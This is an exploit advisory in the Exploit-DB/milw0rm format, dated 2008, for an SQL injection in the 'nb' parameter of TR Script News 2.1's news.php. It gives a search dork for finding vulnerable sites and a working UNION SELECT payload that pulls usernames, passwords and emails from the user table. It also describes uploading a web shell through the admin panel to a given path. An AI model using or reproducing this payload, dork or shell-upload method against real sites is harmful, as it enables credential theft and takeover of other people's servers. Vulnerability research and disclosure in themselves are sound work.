TR News 2.1 - 'nb' SQL Injection

EDB-ID:

5483


Author:

His0k4

Type:

webapps


Platform:

PHP

Date:

2008-04-21


########################################################
#                                                      # 
#  Discovered by : His0k4 {Algerian HaCker}            #
#                                                      #
#  Email : His0k4.hlm[at]gmail[dot]com                 #
#                                                      #
#  Greetz to: All Dz & muslims HaCkeRs  :)               #
#                                                      #
#  Special Greetz:c02,Spym4n,THe-MooRiSH               #
#                                                      #
########################################################
#
#  Script   : Tr Script News v2.1
#
#  Download script     : http://www.easy-script.com/scripts-dl/trscript-21.zip
#
#  Dork        : inurl:news.php?mode=voir
#
#  Vulnerable file    : news.php
#
#  P.O.C
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=[SQL]
# 
#  Exemple:
#  http://www.victime.com/[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
#
#  Admin login: /admin
#
#  Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
#
#############################################################################

# milw0rm.com [2008-04-21]